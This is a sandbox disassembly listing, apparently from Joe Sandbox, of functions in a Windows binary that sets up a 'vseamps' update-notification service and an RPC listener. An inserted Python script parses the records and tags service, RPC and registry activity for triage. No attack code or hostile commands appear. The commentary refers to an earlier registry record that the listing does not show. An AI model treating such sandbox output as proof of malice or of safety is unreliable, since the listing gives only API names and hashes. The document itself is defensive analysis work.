                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen$ComputerName
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3702919091-996641649
                                  • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                  • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                  APIs
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$Info
                                  • String ID:
                                  • API String ID: 1775632426-0
                                  • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                  • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071B1
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071BF
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071E9
                                  • FreeLibrary.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207257
                                  • GetProcAddress.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction ID: 557b634dfabaab833202b5a774b35273f93e90df1d8c47218e0ae8bfa7347e25
                                  • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction Fuzzy Hash: FD31D4B1B1A74195FE15AF26E400DBA6794BF48B60F9D0634ED5D2F390DE3CE4498300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction ID: 2cb3988977a9158e39452ff99fdd54e8acfe6c828045fcd8ef4dd32b7d245c12
                                  • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction Fuzzy Hash: 76213DB0A0C68245FE64BF31D65193B63519F447B0F9C0634E93F2EAE6DE2CA4499B00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction ID: d6e3fe966b1ae33d53e51d73b65c9d03710d9330b42a1facbbfcc81ee0a017a1
                                  • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction Fuzzy Hash: 45118461718B41C2EB509F66E944B2AB3A0FB98FE4F484234E95D5B794CF3CD9448744
                                  APIs
                                  • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                  • CreateEventW.KERNEL32 ref: 00000001400012C0
                                    • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                    • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                    • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                    • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                    • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                    • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                    • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                    • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                    • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                    • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                    • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                  • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                  • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                    • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                    • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                    • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                    • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                    • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                    • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                  • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                  • String ID: vseamps
                                  • API String ID: 3197017603-3944098904
                                  • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                  • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
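The record above (service control handler, `SetServiceStatus`, and an RPC server brought up in the sub-function at 0000000140003F80) and the earlier one that references `SYSTEM\CurrentControlSet\Services\vseamps\Parameters` are the two a reviewer usually wants pulled out of this listing first. The Python below is an added example, not Joe Sandbox code: it parses function records in the plugin layout shown on this page, using a constructed excerpt that mirrors those two records with the hash metadata trimmed, and tags functions that do service control, stand up an RPC server, or touch a Services registry key. The tag names, the triage rule set and the handling of the `$` string separator are assumptions made for the example.

```python
"""Parse Joe Sandbox IDA-plugin function records and tag the interesting ones.

Added example for this report, not Joe Sandbox code. It reads records in the
layout shown on the page (an "APIs" header, bullet lines of API references,
then "• Key: value" metadata) and applies a small, assumed triage rule set.
"""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed excerpt: two records copied in shape from the page (metadata trimmed).
SAMPLE_RECORDS = """
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
Similarity
• API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
• String ID: SYSTEM\\CurrentControlSet\\Services\\vseamps\\Parameters$action
• API String ID: 1119674940-1966266597
APIs
• RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
• CreateEventW.KERNEL32 ref: 00000001400012C0
  • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
  • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
• SetServiceStatus.ADVAPI32 ref: 0000000140001302
  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Strings
Memory Dump Source
• Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
Similarity
• API ID: CriticalSection$Server$CloseEnterHandleLeaveService
• String ID: vseamps
• API String ID: 3197017603-3944098904
"""

# One API reference: "Name.MODULE(args), ref: ADDR", optionally nested under
# "Part of subcall function CALLEE:". Ordinal imports look like "#4.VSELOG".
API_REF = re.compile(
    r"•\s+(?:Part of subcall function (?P<callee>[0-9A-F]+):\s+)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)(?:\(.*?\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)"
)
# Metadata bullet: "• Key: value" (the key is words only, so API lines never match).
META = re.compile(r"•\s+(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

ApiRef = namedtuple("ApiRef", "api module ref callee")


@dataclass
class FunctionRecord:
    meta: dict = field(default_factory=dict)
    api_refs: list = field(default_factory=list)

    @property
    def strings(self):
        # Joe joins referenced strings with "$"; a string that itself ends in
        # "$" (e.g. CONOUT$) therefore loses that character here (assumed split).
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    @property
    def api_names(self):
        return {r.api for r in self.api_refs}


def parse_records(text):
    """Split report text into FunctionRecord objects, one per "APIs" header."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_REF.search(line)
        if m:
            current.api_refs.append(ApiRef(m["api"], m["module"], int(m["ref"], 16), m["callee"]))
            continue
        m = META.match(stripped)
        if m:
            current.meta[m["key"]] = m["value"].strip()
    return records


# Assumed triage rules: which APIs / strings mark a function for closer review.
SERVICE_APIS = {"RegisterServiceCtrlHandlerW", "RegisterServiceCtrlHandlerA",
                "SetServiceStatus", "StartServiceCtrlDispatcherW", "StartServiceCtrlDispatcherA"}


def triage(record):
    """Return tags for a record, in a fixed order so results are comparable."""
    tags, names = [], record.api_names
    if names & SERVICE_APIS:
        tags.append("service-control")
    if any(n.startswith("RpcServer") for n in names):
        tags.append("rpc-server")
    if any("currentcontrolset\\services" in s.lower() for s in record.strings):
        tags.append("services-regkey")
    return tags


def callees(record):
    """Addresses of sub-functions whose calls were folded into this record."""
    return {r.callee for r in record.api_refs if r.callee}


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_RECORDS):
        print(rec.meta.get("API ID"), triage(rec), sorted(callees(rec)))
```

Run it against a whole report export by replacing `SAMPLE_RECORDS` with the file contents; the `callees` set is what turns the flattened "Part of subcall function" lines back into a call tree, which is the quickest way to see that the RPC listener lives in a helper rather than in the service main itself. Note that the `$`-separated string list is lossy for strings that end in `$`, so match on those by API ID instead.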
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Messagesprintf_s
                                  • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                  • API String ID: 2642950106-3610746849
                                  • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                  • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                  • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                  • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 319667368-0
                                  • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                  • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                  • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                    • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 1390108997-0
                                  • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                  • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 3523768491-393685449
                                  • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction ID: 912062a1e2a10727d625d8450e062c860dbc12f463aac3a044a03264adc94223
                                  • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction Fuzzy Hash: 49E195B29087818AEF10AF74D480BBE77A1FB45B48F984135DB9D6B656CF38E489C740
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC32095CB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209601
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320962E
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320963F
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209650
                                  • SetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320966B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction ID: ed1c50bb17997c49093f04b477dda85b111a87f84caeb1cb6af2fb04ca1e063c
                                  • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction Fuzzy Hash: 43113AB0A0C24245FE647F31D65193B63529F48BB0F884334E82F2E6E6DE2CA4459700
                                  APIs
                                  Memory Dump Source
